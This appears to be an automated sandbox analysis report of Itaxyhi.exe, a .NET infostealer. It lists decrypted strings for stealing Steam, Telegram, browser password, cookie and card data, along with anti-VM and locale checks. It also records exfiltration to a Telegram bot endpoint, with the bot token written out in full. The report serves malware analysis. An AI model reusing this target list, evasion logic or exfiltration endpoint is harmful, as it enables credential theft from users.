            Source: Itaxyhi.exe | String decryptor: x
            Source: Itaxyhi.exe | String decryptor: https://get.geojs.io/v1/ip/geo.json
            Source: Itaxyhi.exe | String decryptor: root\SecurityCenter2
            Source: Itaxyhi.exe | String decryptor: SELECT * FROM AntivirusProduct
            Source: Itaxyhi.exe | String decryptor: displayName
            Source: Itaxyhi.exe | String decryptor: X2
            Source: Itaxyhi.exe | String decryptor: :
            Source: Itaxyhi.exe | String decryptor: SELECT * FROM Win32_VideoController
            Source: Itaxyhi.exe | String decryptor: Name
            Source: Itaxyhi.exe | String decryptor: SELECT * FROM Win32_Processor
            Source: Itaxyhi.exe | String decryptor: SELECT * FROM Win32_ComputerSystem
            Source: Itaxyhi.exe | String decryptor: TotalPhysicalMemory
            Source: Itaxyhi.exe | String decryptor: 0
            Source: Itaxyhi.exe | String decryptor: Win32_Processor
            Source: Itaxyhi.exe | String decryptor: ProcessorId
            Source: Itaxyhi.exe | String decryptor: Win32_DiskDrive
            Source: Itaxyhi.exe | String decryptor: SerialNumber
            Source: Itaxyhi.exe | String decryptor: SELECT * FROM
            Source: Itaxyhi.exe | String decryptor: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
            Source: Itaxyhi.exe | String decryptor: ProductName
            Source: Itaxyhi.exe | String decryptor: user32.dll
            Source: Itaxyhi.exe | String decryptor: GetDC
            Source: Itaxyhi.exe | String decryptor: gdi32.dll
            Source: Itaxyhi.exe | String decryptor: GetDeviceCaps
            Source: Itaxyhi.exe | String decryptor: Screenshot.png
            Source: Itaxyhi.exe | String decryptor: *ssfn*
            Source: Itaxyhi.exe | String decryptor: \config
            Source: Itaxyhi.exe | String decryptor: *.vdf
            Source: Itaxyhi.exe | String decryptor: Steam/
            Source: Itaxyhi.exe | String decryptor: HKEY_CURRENT_USER\Software\Valve\Steam
            Source: Itaxyhi.exe | String decryptor: SteamPath
            Source: Itaxyhi.exe | String decryptor: HKEY_CLASSES_ROOT\tg\DefaultIcon
            Source: Itaxyhi.exe | String decryptor: tdata
            Source: Itaxyhi.exe | String decryptor: s
            Source: Itaxyhi.exe | String decryptor: Messengers/Telegram/
            Source: Itaxyhi.exe | String decryptor: file
            Source: Itaxyhi.exe | String decryptor: filename
            Source: Itaxyhi.exe | String decryptor: filedescription
            Source: Itaxyhi.exe | String decryptor: POST
            Source: Itaxyhi.exe | String decryptor: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) Chrome/49.0.1422.399 Safari/600
            Source: Itaxyhi.exe | String decryptor: ----------------------------
            Source: Itaxyhi.exe | String decryptor: multipart/form-data; boundary=
            Source: Itaxyhi.exe | String decryptor: --
            Source: Itaxyhi.exe | String decryptor: Content-Disposition: form-data; name="
            Source: Itaxyhi.exe | String decryptor: "; filename="
            Source: Itaxyhi.exe | String decryptor: "
            Source: Itaxyhi.exe | String decryptor: Content-Type: application/octet-stream
            Source: Itaxyhi.exe | String decryptor: .phem
            Source: Itaxyhi.exe | String decryptor: https://api.telegram.org/bot{0}/sendDocument
            Source: Itaxyhi.exe | String decryptor: document
            Source: Itaxyhi.exe | String decryptor: chat_id
            Source: Itaxyhi.exe | String decryptor: parse_mode
            Source: Itaxyhi.exe | String decryptor: MarkdownV2
            Source: Itaxyhi.exe | String decryptor: caption
            Source: Itaxyhi.exe | String decryptor: wireshark
            Source: Itaxyhi.exe | String decryptor: httpdebbugerui
            Source: Itaxyhi.exe | String decryptor: mtmproxy
            Source: Itaxyhi.exe | String decryptor: sniffer
            Source: Itaxyhi.exe | String decryptor: VirtualBox
            Source: Itaxyhi.exe | String decryptor: VBox
            Source: Itaxyhi.exe | String decryptor: VMware Virtual
            Source: Itaxyhi.exe | String decryptor: VMware
            Source: Itaxyhi.exe | String decryptor: Hyper-V Video
            Source: Itaxyhi.exe | String decryptor: ru-RU
            Source: Itaxyhi.exe | String decryptor: kk-KZ
            Source: Itaxyhi.exe | String decryptor: ro-MD
            Source: Itaxyhi.exe | String decryptor: uz-UZ
            Source: Itaxyhi.exe | String decryptor: be-BY
            Source: Itaxyhi.exe | String decryptor: az-Latn-AZ
            Source: Itaxyhi.exe | String decryptor: hy-AM
            Source: Itaxyhi.exe | String decryptor: ky-KG
            Source: Itaxyhi.exe | String decryptor: tg-Cyrl-TJ
            Source: Itaxyhi.exe | String decryptor:
            Source: Itaxyhi.exe | String decryptor: Account ID:
            Source: Itaxyhi.exe | String decryptor: Token:
            Source: Itaxyhi.exe | String decryptor: Browser:
            Source: Itaxyhi.exe | String decryptor: Name:
            Source: Itaxyhi.exe | String decryptor: Value:
            Source: Itaxyhi.exe | String decryptor: URL:
            Source: Itaxyhi.exe | String decryptor: Username:
            Source: Itaxyhi.exe | String decryptor: Password:
            Source: Itaxyhi.exe | String decryptor: v
            Source: Itaxyhi.exe | String decryptor: (
            Source: Itaxyhi.exe | String decryptor: Number: {0}Placeholder: {1}Expiration: {2}/{3}Browser: {4} v{5} ({6})
            Source: Itaxyhi.exe | String decryptor: UNKNOWN
            Source: Itaxyhi.exe | String decryptor: *.ldb
            Source: Itaxyhi.exe | String decryptor: encrypted_key
            Source: Itaxyhi.exe | String decryptor: DPAPI
            Source: Itaxyhi.exe | String decryptor: roblox.com
            Source: Itaxyhi.exe | String decryptor: ROBLOX
            Source: Itaxyhi.exe | String decryptor: steampowered.com
            Source: Itaxyhi.exe | String decryptor: GAMES
            Source: Itaxyhi.exe | String decryptor: genshin
            Source: Itaxyhi.exe | String decryptor: epicgames.com
            Source: Itaxyhi.exe | String decryptor: qiwi
            Source: Itaxyhi.exe | String decryptor: BANK
            Source: Itaxyhi.exe | String decryptor: tinkoff
            Source: Itaxyhi.exe | String decryptor: yoomoney
            Source: Itaxyhi.exe | String decryptor: sberbank
            Source: Itaxyhi.exe | String decryptor: funpay
            Source: Itaxyhi.exe | String decryptor: MONEY
            Source: Itaxyhi.exe | String decryptor: paypal
            Source: Itaxyhi.exe | String decryptor: americanexpress
            Source: Itaxyhi.exe | String decryptor: amazon
            Source: Itaxyhi.exe | String decryptor: spotify
            Source: Itaxyhi.exe | String decryptor: MUSIC
            Source: Itaxyhi.exe | String decryptor: music.apple
            Source: Itaxyhi.exe | String decryptor: celka.
            Source: Itaxyhi.exe | String decryptor: CHEATS
            Source: Itaxyhi.exe | String decryptor: nursultan.
            Source: Itaxyhi.exe | String decryptor: xone
            Source: Itaxyhi.exe | String decryptor: akrien
            Source: Itaxyhi.exe | String decryptor: interium
            Source: Itaxyhi.exe | String decryptor: nixware
            Source: Itaxyhi.exe | String decryptor: expensive.
            Source: Itaxyhi.exe | String decryptor: gamesense
            Source: Itaxyhi.exe | String decryptor: neverlose
            Source: Itaxyhi.exe | String decryptor: youtube
            Source: Itaxyhi.exe | String decryptor: YOUTUBE
            Source: Itaxyhi.exe | String decryptor: minecraft.net
            Source: Itaxyhi.exe | String decryptor: dQw4w9WgXcQ:[^"]*
            Source: Itaxyhi.exe | String decryptor: dQw4w9WgXcQ:
            Source: Itaxyhi.exe | String decryptor: "\s*:\s*([^,}]+)
            Source: Itaxyhi.exe | String decryptor: SELECT * FROM Win32_Process WHERE ProcessId = {0}
            Source: Itaxyhi.exe | String decryptor: root\CIMV2
            Source: Itaxyhi.exe | String decryptor: ParentProcessId
            Source: Itaxyhi.exe | String decryptor: \Device\LanmanRedirector\
            Source: Itaxyhi.exe | String decryptor: Mozilla/5.0 (
            Source: Itaxyhi.exe | String decryptor: ) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: Itaxyhi.exe | String decryptor: Chrome/{0}.0.{1}.{2} Safari/537.36
            Source: Itaxyhi.exe | String decryptor: Windows NT
            Source: Itaxyhi.exe | String decryptor: 10.0
            Source: Itaxyhi.exe | String decryptor: 6.1
            Source: Itaxyhi.exe | String decryptor: 6.3
            Source: Itaxyhi.exe | String decryptor: 6.2
            Source: Itaxyhi.exe | String decryptor: ; Win64; x64
            Source: Itaxyhi.exe | String decryptor: ; WOW64
            Source: Itaxyhi.exe | String decryptor: UNIQUE
            Source: Itaxyhi.exe | String decryptor: Writing is not allowed
            Source: Itaxyhi.exe | String decryptor: v1
            Source: Itaxyhi.exe | String decryptor: bcrypt.dll
            Source: Itaxyhi.exe | String decryptor: BCryptDecrypt
            Source: Itaxyhi.exe | String decryptor: BCryptDestroyKey
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Code function: 0_2_00007FFD3489BF3D CryptUnprotectData | 0_2_00007FFD3489BF3D
            Source: unknown | HTTPS traffic detected: 172.67.70.233:443 -> 192.168.2.6:49699 version: TLS 1.0
            Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49700 version: TLS 1.2
            Source: Itaxyhi.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Networking

            Source: unknown | DNS query: name: api.telegram.org
            Source: global traffic | HTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1 Host: get.geojs.io Connection: Keep-Alive
            Source: Joe Sandbox View | IP Address: 149.154.167.220 | 149.154.167.220
            Source: Joe Sandbox View | IP Address: 172.67.70.233 | 172.67.70.233
            Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: global traffic | HTTP traffic detected: POST /bot7105333862:AAE6XaSuAERR5F_VgpAajrgcx8b0mCmMnqM/sendDocument HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) Chrome/49.0.1422.399 Safari/600 Content-Type: multipart/form-data; boundary=----------------------------8dd19839ab01d6d Host: api.telegram.org Content-Length: 697295 Expect: 100-continue Connection: Keep-Alive
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global traffic | DNS traffic detected: DNS query: get.geojs.io
            Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
            Source: unknown | HTTP traffic detected: POST /bot7105333862:AAE6XaSuAERR5F_VgpAajrgcx8b0mCmMnqM/sendDocument HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) Chrome/49.0.1422.399 Safari/600 Content-Type: multipart/form-data; boundary=----------------------------8dd19839ab01d6d Host: api.telegram.org Content-Length: 697295 Expect: 100-continue Connection: Keep-Alive
            Source: Itaxyhi.exe, 00000000.00000002.2152408176.0000000002C32000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
            Source: Itaxyhi.exe, 00000000.00000002.2152408176.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://get.geojs.io
            Source: Itaxyhi.exe, 00000000.00000002.2152316151.0000000001205000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ns.ad0/g/im
            Source: Itaxyhi.exe, 00000000.00000002.2152316151.0000000001205000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ns.adobt/pg/
            Source: Itaxyhi.exe, 00000000.00000002.2152408176.0000000002C32000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: Itaxyhi.exe, 00000000.00000002.2152408176.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Itaxyhi.exe, 00000000.00000002.2152408176.0000000002C32000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: Itaxyhi.exe, 00000000.00000002.2152408176.0000000002C32000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
            Source: Itaxyhi.exe, 00000000.00000002.2152408176.0000000002C32000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7105333862:AAE6XaSuAERR5F_VgpAajrgcx8b0mCmMnqM/sendDocument
            Source: Itaxyhi.exe, 00000000.00000002.2152408176.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7105333862:AAE6XaSuAERR5F_VgpAajrgcx8b0mCmMnqM/sendDocument(United
            Source: Itaxyhi.exe, 00000000.00000002.2152408176.0000000002D25000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://get.ge
            Source: Itaxyhi.exe, 00000000.00000002.2152408176.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, Itaxyhi.exe, 00000000.00000002.2152408176.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://get.geojs.io
            Source: Itaxyhi.exe, 00000000.00000002.2152408176.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://get.geojs.io/v1/ip/geo.json
            Source: Itaxyhi.exe, 00000000.00000002.2152408176.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, Itaxyhi.exe, 00000000.00000002.2152408176.0000000002C12000.00000004.00000800.00020000.00000000.sdmp, Itaxyhi.exe, 00000000.00000002.2152408176.0000000002DAF000.00000004.00000800.00020000.00000000.sdmp, Itaxyhi.exe, 00000000.00000002.2152408176.0000000002D9D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://t.me/TheDyer
            Source: Itaxyhi.exe, 00000000.00000002.2152408176.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, Itaxyhi.exe, 00000000.00000002.2152408176.0000000002C12000.00000004.00000800.00020000.00000000.sdmp, Itaxyhi.exe, 00000000.00000002.2152408176.0000000002DAF000.00000004.00000800.00020000.00000000.sdmp, Itaxyhi.exe, 00000000.00000002.2152408176.0000000002D9D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://t.me/webster480
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49700
            Source: unknown | Network traffic detected: HTTP traffic on port 49699 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49699
            Source: unknown | Network traffic detected: HTTP traffic on port 49700 -> 443
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Code function: 0_2_00007FFD34896C78 | 0_2_00007FFD34896C78
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Code function: 0_2_00007FFD348A9082 | 0_2_00007FFD348A9082
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Code function: 0_2_00007FFD348AC4DB | 0_2_00007FFD348AC4DB
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Code function: 0_2_00007FFD348A82D6 | 0_2_00007FFD348A82D6
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Code function: 0_2_00007FFD34893250 | 0_2_00007FFD34893250
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Code function: 0_2_00007FFD34892280 | 0_2_00007FFD34892280
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Code function: 0_2_00007FFD348A0EC8 | 0_2_00007FFD348A0EC8
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Code function: 0_2_00007FFD34892FF2 | 0_2_00007FFD34892FF2
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Code function: 0_2_00007FFD348993E2 | 0_2_00007FFD348993E2
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Code function: 0_2_00007FFD34899438 | 0_2_00007FFD34899438
            Source: Itaxyhi.exe, 00000000.00000000.2088314539.0000000000830000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamesystem.exeH vs Itaxyhi.exe
            Source: Itaxyhi.exe | Binary or memory string: OriginalFilenamesystem.exeH vs Itaxyhi.exe
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/1@2/2
            Source: C:\Users\user\Desktop\Itaxyhi.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Itaxyhi.exe.log
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Mutant created: NULL
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Mutant created: \Sessions\1\BaseNamedObjects\Memirybesohutifojyxifyloxaledoc
            Source: Itaxyhi.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: Itaxyhi.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Users\user\Desktop\Itaxyhi.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: Itaxyhi.exe, 00000000.00000002.2152408176.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Itaxyhi.exe | ReversingLabs: Detection: 79%
            Source: Itaxyhi.exe | Virustotal: Detection: 70%
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Section loaded: mscoree.dll
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Section loaded: dpapi.dll
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Section loaded: windowscodecs.dll
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Section loaded: rasapi32.dll
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Section loaded: rasman.dll
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Section loaded: rtutils.dll
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Section loaded: secur32.dll
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Section loaded: schannel.dll
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Section loaded: mskeyprotect.dll
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Section loaded: ntasn1.dll
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Section loaded: ncrypt.dll
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Section loaded: ncryptsslp.dll
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Section loaded: wbemcomn.dll
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Section loaded: amsi.dll
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
            Source: C:\Users\user\Desktop\Itaxyhi.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: Itaxyhi.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Itaxyhi.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Code function: 0_2_00007FFD3489BAFB push 8B485DE0h; iretd | 0_2_00007FFD3489BB00
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\Itaxyhi.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
            Source: C:\Users\user\Desktop\Itaxyhi.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Memory allocated: F60000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Memory allocated: 1ABA0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Thread delayed: delay time: 600000
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Thread delayed: delay time: 599874
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Thread delayed: delay time: 599765
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Thread delayed: delay time: 599656
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Thread delayed: delay time: 599546
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Thread delayed: delay time: 599437
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Thread delayed: delay time: 599328
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Thread delayed: delay time: 599215
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Thread delayed: delay time: 599109
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Thread delayed: delay time: 598999
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Thread delayed: delay time: 598890
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Thread delayed: delay time: 598781
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Thread delayed: delay time: 598671
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Thread delayed: delay time: 598562
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Thread delayed: delay time: 598453
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Thread delayed: delay time: 598343
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Thread delayed: delay time: 598234
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Thread delayed: delay time: 598050
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Thread delayed: delay time: 597890
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Thread delayed: delay time: 597780
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Thread delayed: delay time: 597671
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Thread delayed: delay time: 597562
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Thread delayed: delay time: 597441
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Thread delayed: delay time: 597328
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Thread delayed: delay time: 597218
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Thread delayed: delay time: 597109
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Thread delayed: delay time: 597000
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Thread delayed: delay time: 596890
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Thread delayed: delay time: 596781
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Thread delayed: delay time: 596671
            Source: C:\Users\user\Desktop\Itaxyhi.exe | Thread delayed: delay time: 596562
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeWindow / User API: threadDelayed 899Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeWindow / User API: threadDelayed 5018Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -11068046444225724s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -599874s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -599765s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -599656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -599546s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -599437s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -599328s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -599215s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -599109s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -598999s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -598890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -598781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -598671s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -598562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -598453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -598343s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -598234s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -598050s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -597890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -597780s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -597671s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -597562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -597441s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -597328s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -597218s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -597109s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -597000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -596890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -596781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -596671s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -596562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5932Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 1708Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\Users\user\Desktop\Itaxyhi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Itaxyhi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 600000Jump to behavior
